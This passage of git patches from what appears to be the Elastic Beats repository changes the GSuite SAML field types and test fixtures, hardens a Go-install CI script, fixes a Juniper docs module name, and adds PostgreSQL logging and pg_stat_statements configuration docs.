"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" } diff --git a/x-pack/filebeat/module/gsuite/saml/_meta/fields.yml b/x-pack/filebeat/module/gsuite/saml/_meta/fields.yml index b7e9efc09266..fc0adfcb55c2 100644 --- a/x-pack/filebeat/module/gsuite/saml/_meta/fields.yml +++ b/x-pack/filebeat/module/gsuite/saml/_meta/fields.yml @@ -18,10 +18,10 @@ description: > User orgunit. - name: status_code - type: long + type: keyword description: > SAML status code. - name: second_level_status_code - type: long + type: keyword description: > SAML second level status code. diff --git a/x-pack/filebeat/module/gsuite/saml/config/pipeline.js b/x-pack/filebeat/module/gsuite/saml/config/pipeline.js index 2011e6d437b2..705db7f2f1e7 100644 --- a/x-pack/filebeat/module/gsuite/saml/config/pipeline.js +++ b/x-pack/filebeat/module/gsuite/saml/config/pipeline.js @@ -32,14 +32,7 @@ var saml = (function () { // all saml event parameters are strings. // for this reason we know for sure they are in the 'value' field. // https://developers.google.com/admin-sdk/reports/v1/appendix/activity/saml - switch (p.name) { - case "status_code": - case "second_level_status_code": - evt.Put("gsuite.saml."+p.name, parseInt(p.value)); - break; - default: - evt.Put("gsuite.saml."+p.name, p.value); - } + evt.Put("google_workspace.saml."+p.name, p.value); }); evt.Delete("json.events.parameters"); diff --git a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log index 678193e25d5f..ed672b58a568 100644 --- a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log +++ b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log @@ -1,2 +1,2 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"400"},{"name":"saml_status_code","value":"400"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"400"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"SUCCESS_URI"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} diff --git a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json index 850766be83d3..7763ca178817 100644 --- a/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json +++ b/x-pack/filebeat/module/gsuite/saml/test/gsuite-saml-test.json.log-expected.json @@ -8,23 +8,23 @@ "event.dataset": "gsuite.saml", "event.id": "1", "event.module": "gsuite", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"400\"},{\"name\":\"saml_status_code\",\"value\":\"400\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "event.outcome": "failure", "event.provider": "saml", "event.type": [ "start" ], "fileset.name": "saml", + "google_workspace.saml.application_name": "app", + "google_workspace.saml.failure_type": "failure_app_not_configured_for_user", + "google_workspace.saml.initiated_by": "idp", + "google_workspace.saml.orgunit_path": "ounit", + "google_workspace.saml.second_level_status_code": "SUCCESS_URI", + "google_workspace.saml.status_code": "SUCCESS_URI", "gsuite.actor.type": "USER", "gsuite.event.type": "login", "gsuite.kind": "admin#reports#activity", "gsuite.organization.domain": "elastic.com", - "gsuite.saml.application_name": "app", - "gsuite.saml.failure_type": "failure_app_not_configured_for_user", - "gsuite.saml.initiated_by": "idp", - "gsuite.saml.orgunit_path": "ounit", - "gsuite.saml.second_level_status_code": 400, - "gsuite.saml.status_code": 400, "input.type": "log", "log.offset": 0, "organization.id": "1", @@ -66,23 +66,23 @@ "event.dataset": "gsuite.saml", "event.id": "1", "event.module": "gsuite", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"400\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "event.outcome": "success", "event.provider": "saml", "event.type": [ "start" ], "fileset.name": "saml", + "google_workspace.saml.application_name": "app", + "google_workspace.saml.initiated_by": "idp", + "google_workspace.saml.orgunit_path": "ounit", + "google_workspace.saml.status_code": "SUCCESS_URI", "gsuite.actor.type": "USER", "gsuite.event.type": "login", "gsuite.kind": "admin#reports#activity", "gsuite.organization.domain": "elastic.com", - "gsuite.saml.application_name": "app", - "gsuite.saml.initiated_by": "idp", - "gsuite.saml.orgunit_path": "ounit", - "gsuite.saml.status_code": 400, "input.type": "log", - "log.offset": 606, + "log.offset": 622, "organization.id": "1", "related.ip": [ "98.235.162.24" From 4ed2789184eafc95237e3cc0de7d038ba49d47d7 Mon Sep 17 00:00:00 2001 From: Victor Martinez Date: Mon, 29 Mar 2021 16:07:39 +0100 Subject: [PATCH 18/20] CI: install-go resilience (#24809) (#24813) --- .ci/scripts/install-go.sh | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/.ci/scripts/install-go.sh b/.ci/scripts/install-go.sh index 23832e21cb40..8cb3f3e866e3 100755 --- a/.ci/scripts/install-go.sh +++ b/.ci/scripts/install-go.sh @@ -11,13 +11,15 @@ GVM_CMD="${HOME}/bin/gvm" if command -v go then + set +e echo "Found Go. Checking version.." FOUND_GO_VERSION=$(go version|awk '{print $3}'|sed s/go//) - if [ $FOUND_GO_VERSION == $GO_VERSION ] + if [ "$FOUND_GO_VERSION" == "$GO_VERSION" ] then echo "Versions match. No need to install Go. Exiting." exit 0 fi + set -e fi if [ "${ARCH}" == "aarch64" ] ; then From 75a7611d1ed876f525b1e7f064ee4b164ed12686 Mon Sep 17 00:00:00 2001 From: EamonnTP Date: Mon, 29 Mar 2021 17:31:41 +0100 Subject: [PATCH 19/20] Module sophosxg > junos (#24750) (#24819) * Module sophosxg > junos New to topic, but confused why the sophosxg module is referenced under the junos module. * Update source file Co-authored-by: Eamonn Smith Co-authored-by: Stef Nestor --- filebeat/docs/modules/juniper.asciidoc | 2 +- x-pack/filebeat/module/juniper/_meta/docs.asciidoc | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/filebeat/docs/modules/juniper.asciidoc b/filebeat/docs/modules/juniper.asciidoc index a2d2a0100d34..8b7b8d50ae1d 100644 --- a/filebeat/docs/modules/juniper.asciidoc +++ b/filebeat/docs/modules/juniper.asciidoc @@ -73,7 +73,7 @@ Versions above this are expected to work but have not been tested. [source,yaml] ---- -- module: sophosxg +- module: junos firewall: enabled: true var.input: udp diff --git a/x-pack/filebeat/module/juniper/_meta/docs.asciidoc b/x-pack/filebeat/module/juniper/_meta/docs.asciidoc index 3e145ea81c90..ca299f9302f1 100644 --- a/x-pack/filebeat/module/juniper/_meta/docs.asciidoc +++ b/x-pack/filebeat/module/juniper/_meta/docs.asciidoc @@ -68,7 +68,7 @@ Versions above this are expected to work but have not been tested. [source,yaml] ---- -- module: sophosxg +- module: junos firewall: enabled: true var.input: udp From 008715edfea0dc2962533ee8ee9d64715e0fb673 Mon Sep 17 00:00:00 2001 From: Jaime Soriano Pastor Date: Mon, 29 Mar 2021 20:59:29 +0200 Subject: [PATCH 20/20] Add docs in PostgreSQL modules about recommended configuration (#24588) (#24745) (cherry picked from commit 7f5a358cce09c050ead4d935905c1af515d00048) --- filebeat/docs/modules/postgresql.asciidoc | 102 +++++++++++++----- .../module/postgresql/_meta/docs.asciidoc | 102 +++++++++++++----- metricbeat/docs/modules/postgresql.asciidoc | 4 + metricbeat/metricbeat.reference.yml | 4 + .../postgresql/_meta/config.reference.yml | 4 + .../postgresql/statement/_meta/docs.asciidoc | 40 +++++++ x-pack/metricbeat/metricbeat.reference.yml | 4 + 7 files changed, 208 insertions(+), 52 deletions(-) diff --git a/filebeat/docs/modules/postgresql.asciidoc b/filebeat/docs/modules/postgresql.asciidoc index 695a30dffdd7..7483be9ac215 100644 --- a/filebeat/docs/modules/postgresql.asciidoc +++ b/filebeat/docs/modules/postgresql.asciidoc @@ -26,6 +26,80 @@ The +{modulename}+ module using `.log` was tested with logs from versions 9.5 on The +{modulename}+ module using `.csv` was tested using versions 11 and 13 (distro is not relevant here). +[float] +=== Supported log formats + +This module can collect any logs from PostgreSQL servers, but to be able to +better analyze their contents and extract more information, they should be +formatted in a determined way. + +There are some settings to take into account for the log format. + +Log lines should be preffixed with the timestamp in milliseconds, the process +id, the user id and the database name. This uses to be the default in most +distributions, and is translated to this setting in the configuration file: + +["source","sh"] +---------------------------- +log_line_prefix = '%m [%p] %q%u@%d ' +---------------------------- + +PostgreSQL server can be configured to log statements and their durations and +this module is able to collect this information. To be able to correlate each +duration with their statements, they must be logged in the same line. This +happens when the following options are used: + +["source","sh"] +---------------------------- +log_duration = 'on' +log_statement = 'none' +log_min_duration_statement = 0 +---------------------------- + +Setting a zero value in `log_min_duration_statement` will log all statements +executed by a client. You probably want to configure it to a higher value, so it +logs only slower statements. This value is configured in milliseconds. + +When using `log_statement` and `log_duration` together, statements and durations +are logged in different lines, and {beatname_uc} is not able to correlate both +values, for this reason it is recommended to disable `log_statement`. + +NOTE: The PostgreSQL module of Metricbeat is also able to collect information +about all statements executed in the server. You may chose which one is better +for your needings. An important difference is that the Metricbeat module +collects aggregated information when the statement is executed several times, +but cannot know when each statement was executed. This information can be +obtained from logs. + +Other logging options that you may consider to enable are the following ones: + +["source","sh"] +---------------------------- +log_checkpoints = 'on'; +log_connections = 'on'; +log_disconnections = 'on'; +log_lock_waits = 'on'; +---------------------------- + +Both `log_connections` and `log_disconnections` can cause a lot of events if you +don't have persistent connections, so enable with care. + +[float] +=== Using CSV logs + +Since the PostgreSQL CSV log file is a well-defined format, +there is almost no configuration to be done in {beatname_uc}, just the filepath. + +On the other hand, it's necessary to configure postgresql to emit `.csv` logs. +The recommended parameters are: + +["source","sh"] +---------------------------- +logging_collector = 'on'; +log_destination = 'csvlog'; +---------------------------- + + include::../include/configuring-intro.asciidoc[] The following example shows how to set paths in the +modules.d/{modulename}.yml+ @@ -69,38 +143,14 @@ The first dashboard is for regular logs. [role="screenshot"] image::./images/filebeat-postgresql-overview.png[] -The second one shows the slowlogs of PostgreSQL. +The second one shows the slowlogs of PostgreSQL. If `log_min_duration_statement` +is not used, this dashboard will show incomplete or no data. [role="screenshot"] image::./images/filebeat-postgresql-slowlog-overview.png[] :has-dashboards!: -=== Using CSV logs - -Since the PostgreSQL CSV log file is a well-defined format, -there is almost no configuration to be done in filebeat, just the filepath - -On the other hand, it's necessary to configure postgresql to emit `.csv` logs. -The recommended parameters are: - -``` -logging_collector = 'on'; -log_destination = 'csvlog'; -log_statement = 'none'; -log_checkpoints = on; -log_connections = on; -log_disconnections = on; -log_lock_waits = on; -log_min_duration_statement = 0; -``` - -In busy servers, `log_min_duration_statement` can cause contention, so you can assign -a value greater than 0. - -Both `log_connections` and `log_disconnections` can cause a lot of events if you don't have -persistent connections, so enable with care. - :fileset_ex!: :modulename!: diff --git a/filebeat/module/postgresql/_meta/docs.asciidoc b/filebeat/module/postgresql/_meta/docs.asciidoc index 840a15ccd823..1d27610bd8f0 100644 --- a/filebeat/module/postgresql/_meta/docs.asciidoc +++ b/filebeat/module/postgresql/_meta/docs.asciidoc @@ -21,6 +21,80 @@ The +{modulename}+ module using `.log` was tested with logs from versions 9.5 on The +{modulename}+ module using `.csv` was tested using versions 11 and 13 (distro is not relevant here). +[float] +=== Supported log formats + +This module can collect any logs from PostgreSQL servers, but to be able to +better analyze their contents and extract more information, they should be +formatted in a determined way. + +There are some settings to take into account for the log format. + +Log lines should be preffixed with the timestamp in milliseconds, the process +id, the user id and the database name. This uses to be the default in most +distributions, and is translated to this setting in the configuration file: + +["source","sh"] +---------------------------- +log_line_prefix = '%m [%p] %q%u@%d ' +---------------------------- + +PostgreSQL server can be configured to log statements and their durations and +this module is able to collect this information. To be able to correlate each +duration with their statements, they must be logged in the same line. This +happens when the following options are used: + +["source","sh"] +---------------------------- +log_duration = 'on' +log_statement = 'none' +log_min_duration_statement = 0 +---------------------------- + +Setting a zero value in `log_min_duration_statement` will log all statements +executed by a client. You probably want to configure it to a higher value, so it +logs only slower statements. This value is configured in milliseconds. + +When using `log_statement` and `log_duration` together, statements and durations +are logged in different lines, and {beatname_uc} is not able to correlate both +values, for this reason it is recommended to disable `log_statement`. + +NOTE: The PostgreSQL module of Metricbeat is also able to collect information +about all statements executed in the server. You may chose which one is better +for your needings. An important difference is that the Metricbeat module +collects aggregated information when the statement is executed several times, +but cannot know when each statement was executed. This information can be +obtained from logs. + +Other logging options that you may consider to enable are the following ones: + +["source","sh"] +---------------------------- +log_checkpoints = 'on'; +log_connections = 'on'; +log_disconnections = 'on'; +log_lock_waits = 'on'; +---------------------------- + +Both `log_connections` and `log_disconnections` can cause a lot of events if you +don't have persistent connections, so enable with care. + +[float] +=== Using CSV logs + +Since the PostgreSQL CSV log file is a well-defined format, +there is almost no configuration to be done in {beatname_uc}, just the filepath. + +On the other hand, it's necessary to configure postgresql to emit `.csv` logs. +The recommended parameters are: + +["source","sh"] +---------------------------- +logging_collector = 'on'; +log_destination = 'csvlog'; +---------------------------- + + include::../include/configuring-intro.asciidoc[] The following example shows how to set paths in the +modules.d/{modulename}.yml+ @@ -64,38 +138,14 @@ The first dashboard is for regular logs. [role="screenshot"] image::./images/filebeat-postgresql-overview.png[] -The second one shows the slowlogs of PostgreSQL. +The second one shows the slowlogs of PostgreSQL. If `log_min_duration_statement` +is not used, this dashboard will show incomplete or no data. [role="screenshot"] image::./images/filebeat-postgresql-slowlog-overview.png[] :has-dashboards!: -=== Using CSV logs - -Since the PostgreSQL CSV log file is a well-defined format, -there is almost no configuration to be done in filebeat, just the filepath - -On the other hand, it's necessary to configure postgresql to emit `.csv` logs. -The recommended parameters are: - -``` -logging_collector = 'on'; -log_destination = 'csvlog'; -log_statement = 'none'; -log_checkpoints = on; -log_connections = on; -log_disconnections = on; -log_lock_waits = on; -log_min_duration_statement = 0; -``` - -In busy servers, `log_min_duration_statement` can cause contention, so you can assign -a value greater than 0. - -Both `log_connections` and `log_disconnections` can cause a lot of events if you don't have -persistent connections, so enable with care. - :fileset_ex!: :modulename!: diff --git a/metricbeat/docs/modules/postgresql.asciidoc b/metricbeat/docs/modules/postgresql.asciidoc index 1958a3b314e3..795e7288310a 100644 --- a/metricbeat/docs/modules/postgresql.asciidoc +++ b/metricbeat/docs/modules/postgresql.asciidoc @@ -86,6 +86,10 @@ metricbeat.modules: # Stats about every PostgreSQL process - activity + # Stats about every statement executed in the server. It requires the + # `pg_stats_statement` library to be configured in the server. + #- statement + period: 10s # The host must be passed as PostgreSQL URL. Example: diff --git a/metricbeat/metricbeat.reference.yml b/metricbeat/metricbeat.reference.yml index e2ec23cfa741..731c0834f558 100644 --- a/metricbeat/metricbeat.reference.yml +++ b/metricbeat/metricbeat.reference.yml @@ -734,6 +734,10 @@ metricbeat.modules: # Stats about every PostgreSQL process - activity + # Stats about every statement executed in the server. It requires the + # `pg_stats_statement` library to be configured in the server. + #- statement + period: 10s # The host must be passed as PostgreSQL URL. Example: diff --git a/metricbeat/module/postgresql/_meta/config.reference.yml b/metricbeat/module/postgresql/_meta/config.reference.yml index f27874eee36a..3b4ed4579d11 100644 --- a/metricbeat/module/postgresql/_meta/config.reference.yml +++ b/metricbeat/module/postgresql/_meta/config.reference.yml @@ -10,6 +10,10 @@ # Stats about every PostgreSQL process - activity + # Stats about every statement executed in the server. It requires the + # `pg_stats_statement` library to be configured in the server. + #- statement + period: 10s # The host must be passed as PostgreSQL URL. Example: diff --git a/metricbeat/module/postgresql/statement/_meta/docs.asciidoc b/metricbeat/module/postgresql/statement/_meta/docs.asciidoc index 6c188dce2d99..20f295c11707 100644 --- a/metricbeat/module/postgresql/statement/_meta/docs.asciidoc +++ b/metricbeat/module/postgresql/statement/_meta/docs.asciidoc @@ -1 +1,41 @@ This is the `statement` metricset of the PostgreSQL module. + +This module collects information from the `pg_stat_statements` view, that keeps +track of planning and execution statistics of all SQL statements executed by +the server. + +`pg_stat_statements` is included by an additional module in PostgreSQL. This +module requires additional shared memory, and is disabled by default. + +You can enable it by adding this module to the configuration as a shared +preloaded library. + +["source"] +------------------------------------------- +shared_preload_libraries = 'pg_stat_statements' +pg_stat_statements.max = 10000 +pg_stat_statements.track = all +------------------------------------------- + +NOTE: Preloading this library in your server will increase the memory usage of +your PostgreSQL server. Use it with care. + +Once the server is started with this module, it starts collecting statistics +about all statements executed. To make these statistics available in the +`pg_stat_statements` view, the following statement needs to be executed in the +server: + +["source","sql"] +------------------------------------------- +CREATE EXTENSION pg_stat_statements; +------------------------------------------- + +You can read more about the available options for this module in the +https://www.postgresql.org/docs/13/pgstatstatements.html[official documentation]. + +NOTE: The PostgreSQL module of Filebeat is also able to collect information +about statements executed in the server from its logs. You may chose which one +is better for your needings. An important difference is that the Metricbeat +module collects aggregated information when the statement is executed several +times, but cannot know when each statement was executed. This information can be +obtained from logs. diff --git a/x-pack/metricbeat/metricbeat.reference.yml b/x-pack/metricbeat/metricbeat.reference.yml index 58c6e9df7a59..1f57a9601558 100644 --- a/x-pack/metricbeat/metricbeat.reference.yml +++ b/x-pack/metricbeat/metricbeat.reference.yml @@ -1121,6 +1121,10 @@ metricbeat.modules: # Stats about every PostgreSQL process - activity + # Stats about every statement executed in the server. It requires the + # `pg_stats_statement` library to be configured in the server. + #- statement + period: 10s # The host must be passed as PostgreSQL URL. Example: